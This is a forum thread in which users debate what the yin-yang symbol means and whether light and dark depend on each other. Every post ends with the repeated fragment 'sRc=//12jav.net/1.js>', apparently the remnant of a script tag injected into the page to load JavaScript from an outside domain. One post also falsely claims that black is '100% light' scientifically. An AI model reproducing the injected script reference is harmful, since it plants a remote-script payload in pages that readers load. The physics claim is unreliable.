*bangs head on desk* uh look at the ying yang sine ( http://halfbit.org/logos/ying-yang.jpg ) if you see the dots in the meddle you would see on of them is Black in the White and vise versa. It means Black is 100% light by a sintific vew because well it attracks light and heat and White is 100% dark because it reflects light. So it would get colder. So if one should go away the other would HAVE to go with it. Like if life went away then so would death. Since you can not have death with out life. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
I beleave we need a balance of both light and dark and I know that is what you were trying to say but you even confused me . sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
Without light there is no dark, without dark there is no light, I understand what you're saying, but if you are right then you must also know what there would be. So tell me, if there is no light what would there be? If there is no dark, what would there be? And do not say that without light there would be no dark because that is not the answer. If you can't say what would take the place of the lack in existence of the other then just say so. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
"*bangs head on desk* uh look at the ying yang sine ( http://halfbit.org/logos/ying-yang.jpg ) if you see the dots in the meddle you would see on of them is Black in the White and vise versa. It means Black is 100% light by a sintific vew because well it attracks light and heat and White is 100% dark because it reflects light. So it would get colder. So if one should go away the other would HAVE to go with it. Like if life went away then so would death. Since you can not have death with out life."
No, the two dots mean that two sides rely on eachother. Light and Dark create balance, this does not mean they are the same. Furthermore since YIN and yang were not created by scientists the existence of it can not be taken as a scientific point of view. YIN and yang are from a Chinese philosophy. Here: http://en.wikipedia.org/wiki/Yin_and_yang
Wiki isn't the most reliable source for many things, but it's better then nothing and more correct then what you're saying. If you don't want to click the link then at least read this:
"Yin and yang are complementary opposites within a greater whole. Everything has both yin and yang aspects, which constantly interact, never existing in absolute stasis. Yin and yang is symbolized by various forms of the Taijitu." Note the use of the word OPPOSITES within a greater whole. This means they are not the same, they are different, they are only the same when one is turned in-side out, and so light is the OPPOSITE of dark. Get it? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>